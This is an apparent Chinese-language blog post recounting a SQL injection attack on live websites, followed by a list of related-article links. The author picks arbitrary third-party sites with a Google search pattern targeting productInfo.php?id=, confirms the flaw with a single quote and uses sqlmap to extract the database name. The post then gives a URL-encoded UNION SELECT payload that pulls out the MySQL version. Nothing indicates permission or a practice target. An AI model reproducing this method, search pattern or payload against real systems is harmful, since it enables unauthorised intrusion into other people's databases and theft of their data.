一次SQL隱碼攻擊實戰記錄

smileleooo發表於2024-04-07

一、在Google瀏覽器用inurl搜尋語法尋找目標

inrul:productInfo.php?id=

二、隨便點開幾個連線，目標出現了

給id引數加單引號'，頁面不正常了，在上方還出現了查詢報錯的相關資訊，相關資訊還給出了資料庫是MySQL。

三、使用sqlmap進行掃描

經過小小的等待，有收穫了，爆出了資料庫名。

根據sqlmap的給出paylaod可以進行SQL隱碼攻擊，改變concat函式的引數就可以了手工利用了，如下payload可以爆出資料庫版本：

-8444%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(VERSION(),0x41756942736671524472427366534f54644f42527170684356664c43775571656253554978616557,0x716a626271),NULL,NULL,NULL,NULL,NULL,NULL--%20-

concat函式的三個引數都是可以回顯利用的。

到這裡SQL隱碼攻擊已經完成了，點到為止。

若有錯誤，歡迎指正！o(￣▽￣)ブ

記一次SQL隱碼攻擊實戰
2016-09-08
SQL
SQL隱碼攻擊靶場實戰-小白入門
2021-04-01
SQL
SQL隱碼攻擊
2024-07-02
SQL
預防SQL隱碼攻擊筆記
2019-06-18
SQL筆記
【SQL Server】--SQL隱碼攻擊
2015-01-31
SQLServer
反恐精英之動態SQL和SQL隱碼攻擊-SQL隱碼攻擊-SQL隱碼攻擊技術-語句注入
2014-02-16
SQL
反恐精英之動態SQL和SQL隱碼攻擊-SQL隱碼攻擊-SQL隱碼攻擊技術-語句修改
2014-02-16
SQL
MYSQL SQL隱碼攻擊
2021-11-20
MySql
【SQL隱碼攻擊原理】
2018-01-17
SQL
防止SQL隱碼攻擊
2010-04-20
SQL
SQL隱碼攻擊（一）
2009-12-14
SQL
SQL隱碼攻擊(pikachu)
2024-05-10
SQL
SQL隱碼攻擊方法
2024-07-08
SQL
反恐精英之動態SQL和SQL隱碼攻擊-SQL隱碼攻擊
2014-02-16
SQL
反恐精英之動態SQL和SQL隱碼攻擊-SQL隱碼攻擊-防衛SQL隱碼攻擊-驗證檢查
2014-02-16
SQL
反恐精英之動態SQL和SQL隱碼攻擊-SQL隱碼攻擊-防衛SQL隱碼攻擊-繫結變數
2014-02-16
SQL變數
SQL隱碼攻擊原理是什麼?如何防範SQL隱碼攻擊？
2022-11-24
SQL
反恐精英之動態SQL和SQL隱碼攻擊-SQL隱碼攻擊-防衛SQL隱碼攻擊-顯式格式化模型
2014-02-16
SQL模型
反恐精英之動態SQL和SQL隱碼攻擊-SQL隱碼攻擊-SQL隱碼攻擊技術-資料型別轉換
2014-02-16
SQL資料型別
SQL隱碼攻擊式攻擊掃描器
2008-07-15
SQL
一次簡單的SQL隱碼攻擊繞WAF
2021-10-18
SQL
SQL隱碼攻擊語句
2018-07-25
SQL
pikachu-SQL隱碼攻擊
2020-11-21
SQL
SQL隱碼攻擊導圖
2018-06-15
SQL
SQL隱碼攻擊問題
2017-03-30
SQL
SQL隱碼攻擊的例子
2017-03-13
SQL
ZMLCMS-SQL隱碼攻擊
2017-08-20
SQL
SQL隱碼攻擊演練
2013-09-16
SQL
預防SQL隱碼攻擊
2010-04-02
SQL
SQL隱碼攻擊總結
2024-08-31
SQL
實戰篇——SQL隱碼攻擊sqli-labs-master靶場實戰三
2024-07-03
SQLAST
DVWA-SQL Injection（SQL隱碼攻擊）
2023-03-18
SQL
攻擊JavaWeb應用[3]-SQL隱碼攻擊[1]
2020-08-19
JavaWebSQL
攻擊JavaWeb應用[4]-SQL隱碼攻擊[2]
2020-08-19
JavaWebSQL
【網路安全】什麼是SQL隱碼攻擊漏洞?SQL隱碼攻擊的特點!
2021-09-06
SQL
SQL隱碼攻擊關聯分析
2020-08-19
SQL
SQL隱碼攻擊-堆疊注入
2021-07-04
SQL
XSS與SQL隱碼攻擊
2020-12-25
SQL

一次SQL隱碼攻擊實戰記錄

相關文章